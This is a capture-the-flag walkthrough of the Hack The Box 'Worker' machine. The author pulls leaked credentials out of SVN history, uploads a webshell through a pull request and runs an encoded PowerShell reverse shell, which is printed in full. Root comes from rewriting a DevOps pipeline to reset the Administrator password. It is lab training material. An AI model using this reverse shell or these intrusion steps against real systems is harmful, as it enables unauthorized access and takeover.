# Hack The Box - Worker Walkthrough without Metasploit
## Enumeration
Run nmap against our target 10.10.10.203 with the following flags:
-sC Script scan, equivalent to --script=default
-sV Service version info
-p- Scan all ports
```
nmap -sC -sV -p- 10.10.10.203
```
### Http
We discover a web page on port 80 which doesn't seem to have much at first glance:
But as always, when we encounter a web page, we run gobuster against it:
```
gobuster dir -u 10.10.10.203 -w /usr/share/wordlists/dirb/common.txt -t 40 -e
```
We didn't get much from this port (also ran the command with bigger wordlists and *-x* to add some common windows extensions such as **asp** or **aspx** along with **jsp**, **html**, **php**, **db**, **txt**, **xml** but we got no luck either)
### Svn
There's a svn Subversion, running on port 3690.
**Subversion**: Is a VCS (Version Control System)... it's "like" **Git** with some differences...
Centralized instead of distributed
You must be connected to make commits
Each user can have just one copy of the trunk
Branching or merging is... well quite time-consuming
Maybe that's why less than 10% of the professional devs use it... and i guess those that use it are because they are forced to...) But it came like 5 years before Git. In case someone wants to know a bit more about it:
{% embed url="" %}
#### Checkout
We are going to checkout whatever repository we have there:
```
svn checkout svn://10.10.10.203
```
The most interesting file here is moved.txt:
We found a new Host to add to our /etc/hosts:
```
sudo nano /etc/hosts
```
Now we can try to access that url:
#### Gathering info from SVN
So, we need some credentials to access here... Let's dig a bit more on that svn repository we just downloaded in order to see if we can find something useful:
```
svn info
```
We got the Revision number, which is **5** and the name of a user **nathen.**
#### SVN diff
The revision number is actually really important, this means we can compare this revision to the previous four and see if there are some differences:
```
svn diff -r
```
The only change is the moved.txt that we saw before, let's try a different revision:
We can confirm the user **nathen** and... was there some password in plain text!? We have to take a look at Revision 2:
#### Repository
Now we have a user **nathen** and password **wendel98**, if we try to use it on
Clicking on SmartHotel360 will take us to the following page:
Here we can see the Repositories:
## Exploitation
We are going to try and use the SVN repository to gain access to the box, in order to do so we must be able to make some changes to master and upload a page that allow us to execute commands on the machine, since it's IIS 10.0 the page has to be either **asp** or **aspx.**
### Foothold
Tried to commit directly on master, but we were unable to do so, we are going to create a new branch, make some changes and then do a pull request.
On Repos go to Branches, New Branch, give your branch a name and Create branch:
Click on our new created branch:
Now upload a cmdasp.aspx (We have one ready to use in our Kali located on '/usr/share/webshells/aspx/cmdasp.aspx')
Click on Upload File(s), browse... and then select our cmdasp.aspx:
We also have to link a work item to the commit:
Now we just click on commit and we'll be able to see the new commit id, and the aspx file on the branch successfully uploaded.
We have to click on Create a pull request (we can see it on the commit id on the previous picture).
Create a New Pull Request of our evilbranch into master, selecting Nathalie (our user) as Reviewer:
If we take a long time to do this process, we may face this problem:
In order to avoid it we have to prepare what we want to do and do it as fast as possible, now we have to repeat the process and will have to use another branch name too.
Once we are back at this point, we have to approve the commit:
And Set auto-complete:
It will automatically complete the pull request
If we go to the master branch now, we should be able to see our cmd page there:
If we look closely, we will see next to master there is a subdomain name **spectral** so in order to access our new feature we need to add that to our /etc/hosts:
Now if we try to access our new feature:
It was deleted, we really have to move fast in order to be able to get access to this machine it seems. So, we are going to prepare all the steps now, the cmdasp.aspx and the command we will use on it to gain access, which will be an encoded reverse.ps1 script.
We prepare an encoded reverse powershell script
Reverse Powershell script:
```bash
$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes=0..655535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();
```
We encode it with our PSEnconder.py:
{% embed url="" %}
```
python3 PSEncoder.py /path/to/our/reverse.ps1
```
Now on the command shell we have in the page we enter the encoded powershell script with the following arguments
-Exec ByPass
-Nol
-Enc
```
PowerShell.exe -Exec ByPass -Nol -Enc
```
Have a netcat listening on the port indicated and click on execute:
## Internal Enumeration
First let's take a look at the user we are after:
We can see there are more than one volume on this box:
If we go into that volume and take a look around, we will see a passwd file under **svnrepos/www/conf**
### Impersonating the user
Let's use the tool evil-winrm to enter as robisl with that password:
{% embed url="" %}
```
evil-winrm -i -u -p
```
We are in as robisl and we can grab our user flag, now let's try to escalate privileges, in order to do that we are going to try and access the repository as robisl.
### Privilege Escalation
Log in devops.worker.htb as robisl
In order to escalate privileges we are going to exploit the Pipelines feature:
Since the Repository is an Azure Repos Git:
Select our Repository:
Create a Starter pipeline:
The important thing here to modify is the script part:
We get rid of everything not needed and change the net user Administrator password on the script:
Save and run:
We wait a bit meanwhile it does everything, we should have this:
Let's try evi-winrm again with our new creds.
## Pwnd
We can grab the root flag ;)